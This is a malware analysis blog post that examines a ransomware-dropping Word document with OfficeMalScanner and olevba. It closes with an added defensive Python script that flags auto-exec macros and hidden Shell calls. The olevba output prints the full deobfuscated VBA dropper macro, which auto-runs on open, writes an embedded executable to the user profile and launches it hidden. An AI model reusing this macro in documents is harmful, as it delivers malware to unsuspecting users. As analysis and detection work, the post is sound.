Documents From Hell Part 2

--

@author Evan Saez

@since 09/09/2016

@see malware analysis

--

After recovering from cyber security summer camp with my fellow author Randy, I found myself horridly behind on blog posts and realized I was well overdue in following up the analysis of our ransomware dropper. We already determined in our previous post [word-documents-from-hell-part1] that the Word document we are dissecting is loaded with malicious VBA macro code. Let's take another look at the methodology we're using to examine malicious documents.

1. Locate potentially malicious embedded code, such as shellcode, VBA macros, or JavaScript.
2. Extract suspicious code from the file.
3. If relevant, disassemble and/or debug shellcode.
4. If relevant, deobfuscate and examine JavaScript, ActionScript, or VB macro code.
5. Understand next steps in the infection chain.

We successfully completed the first two steps in our last post, identifying the streams in which the VBA macro was located and extracting the code with oledump.py by Didier Stevens. We found that the embedded exe file ojGlBWnEuEy.exe is run by the VBA macro, and according to this report [ransomware report] the file is indeed a nasty piece of ransomware.

The next step is to identify any shellcode within the document. Shellcode, according to Wikipedia, "is a small piece of code used as the payload in the exploitation of a software vulnerability," but in our case it could also be the command that runs the exe file embedded in the document. Once we identify the location of the shellcode within the doc we can disassemble it, which can give us more information on the malware's properties and some insight into how we can write an IOC (indicator of compromise) for this sample.

Once again we're going to turn to the OfficeMalScanner suite for analysis. We're going to use MalHostSetup's debug scan feature to identify any shellcode present in the Word document.

[image: one]

[image: two]

Sure enough, MalHostSetup located 4 instances of the string 'shell execute' at offsets 0x84663, 0x86819, 0x86841, and 0x86918. If we view those offsets in a hex editor we can get a better picture of what follows the shell execute commands.

[image: three]

We can see some VB strings preceding the shell execute command, but this appears to be an empty macro.

[image: four]

Offsets 0x86819, 0x86841, and 0x86918 show the meat of the malicious macro code. We can make out a few strings associated with VBA script along with the additional shell execute commands. We can use olevba.py, which is part of Philippe Lagadec's oletools suite, to clean up the VBA script and get a clearer picture of the code. We're going to use the --deobf option, which attempts to deobfuscate VBA expressions, and the --decode option, which displays all the obfuscated strings with their decoded content along with the rest of the VBA source code.

In the analysis output below we can see an outline of the VBA macro and how it is running the embedded exe file. Now that we've dissected this Word doc, the only thing left to do is add 'ojGlBWnEuEy.exe' to the file blacklist on your anti-virus or security appliance and hope your users are less click-happy going forward. Keep in mind, though, that while you're updating your latest and greatest overpriced security tools, the bad guys are probably three updates and a version upgrade ahead of you.

flux@Reverser:~/Labs-and-samples/ransoemware_blog_post/OfficeMalScanner$ olevba.py USPS_DELIVERY_TRACKING_ETA.doc.bin --deobf --decode
olevba 0.47 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASI---V USPS_DELIVERY_TRACKING_ETA.doc.bin
===============================================================================
FILE: USPS_DELIVERY_TRACKING_ETA.doc.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin - OLE stream: u'Macros/VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Wait(seconds As Integer)
Dim now As Long
now = Timer()
Do
DoEvents
Loop While (Timer < now + seconds)
End Sub

Sub Auto_Open()
Etygo12
End Sub

Sub Etygo12()
Dim Etygo7 As Integer
Dim Etygo1 As String
Dim Etygo2 As String
Dim Etygo3 As Integer
Dim Etygo4 As Paragraph
Dim Etygo8 As Long
Dim Etygo9 As Boolean
Dim Etygo5 As Integer
Dim Etygo11 As String
Dim Etygo6 As Byte
Dim Ahsfnqotcd As String
Ahsfnqotcd = "Ahsfnqotcd"
Etygo1 = "ojGlBWnEuEy.exe"
Etygo2 = Environ("USERPROFILE")
ChDrive (Etygo2)
ChDir (Etygo2)
Etygo3 = FreeFile()
Open Etygo1 For Binary As Etygo3
For Each Etygo4 In ActiveDocument.Paragraphs
DoEvents
Etygo11 = Etygo4.Range.Text
If (Etygo9 = True) Then
Etygo8 = 1
While (Etygo8 < Len(Etygo11))
Etygo6 = Mid(Etygo11, Etygo8, 4)
Put #Etygo3, , Etygo6
Etygo8 = Etygo8 + 4
Wend
ElseIf (InStr(1, Etygo11, Ahsfnqotcd) > 0 And Len(Etygo11) > 0) Then
Etygo9 = True
End If
Next
Close #Etygo3
Etygo13 (Etygo1)
End Sub

Sub Etygo13(Etygo10 As String)
Dim Etygo7 As Integer
Dim Etygo2 As String
Etygo2 = Environ("USERPROFILE")
ChDrive (Etygo2)
ChDir (Etygo2)
Wait (3)
Etygo7 = Shell(Etygo10, vbHide)
End Sub

Sub AutoOpen()
Auto_Open
End Sub

Sub Workbook_Open()
Auto_Open
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub Etygo13(Etygo10 As String)
Dim Etygo7 As Integer
Dim Etygo2 As String
Etygo2 = Environ("USERPROFILE")
ChDrive (Etygo2)
ChDir (Etygo2)
Sleep 1000
Etygo7 = Shell(Etygo10, vbHide)
End Sub
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
| AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
| Suspicious | Open                 | May open a file                         |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | vbHide               | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Binary               | May read or write a binary file (if     |
|            |                      | combined with Open)                     |
| Suspicious | Environ              | May read system environment variables   |
| Suspicious | Put                  | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
|            | Strings              | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | ojGlBWnEuEy.exe      | Executable file name                    |
| VBA string | %USERPROFILE%        | Environ("USERPROFILE")                  |
+------------+----------------------+-----------------------------------------+
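A small static triage pass over the macro, as an added example (not the page's code and not part of oletools): it reproduces the AutoExec / Suspicious / IOC classification from the olevba table above against a constructed excerpt of the NewMacros.bas module quoted on this page, and flags the dropper pattern the post describes (auto-exec entry point, binary file write, hidden Shell call). The heuristics and the sample excerpt are this example's own assumptions.

```python
import re

# Constructed sample: the dropper-relevant lines of the NewMacros.bas module quoted
# above, reduced to what the analyzer looks at (the real document is not embedded).
SAMPLE_VBA = '''
Sub Auto_Open()
Etygo12
End Sub
Sub Etygo12()
Ahsfnqotcd = "Ahsfnqotcd"
Etygo1 = "ojGlBWnEuEy.exe"
Etygo2 = Environ("USERPROFILE")
Etygo3 = FreeFile()
Open Etygo1 For Binary As Etygo3
Put #Etygo3, , Etygo6
Close #Etygo3
Etygo13 (Etygo1)
End Sub
Sub Etygo13(Etygo10 As String)
Etygo7 = Shell(Etygo10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
'''

# Entry points Office runs without user interaction (the AutoExec rows in the table above).
AUTOEXEC = {"autoopen", "auto_open", "workbook_open", "document_open"}

def analyze_vba(src):
    """Triage one VBA module: auto-exec subs, Shell calls, Environ() lookups, .exe names, binary writes."""
    f = {"autoexec": [], "shell": [], "environ": [], "exe_names": [], "binary_write": False}
    for line in src.splitlines():
        s = line.strip()
        m = re.match(r"(?i)^(?:Private\s+|Public\s+)?Sub\s+(\w+)", s)
        if m and m.group(1).lower() in AUTOEXEC:
            f["autoexec"].append(m.group(1))
        if re.search(r"(?i)\bShell\s*\(", s):  # vbHide hides the launched process window
            f["shell"].append({"line": s, "hidden": "vbhide" in s.lower()})
        f["environ"] += re.findall(r'(?i)Environ\s*\(\s*"([^"]+)"', s)
        f["exe_names"] += re.findall(r'(?i)"([^"]*\.exe)"', s)
        if re.search(r"(?i)\bOpen\b.*\bFor\s+Binary\b", s):
            f["binary_write"] = True
    return f

def is_dropper_like(f):
    """Heuristic: auto-executes, writes a binary file, then launches something hidden."""
    return bool(f["autoexec"]) and f["binary_write"] and any(s["hidden"] for s in f["shell"])
```

The `exe_names` list is what you would feed to the blacklist the post recommends; the `autoexec` and `shell` findings are the detection signal for other documents that follow the same pattern.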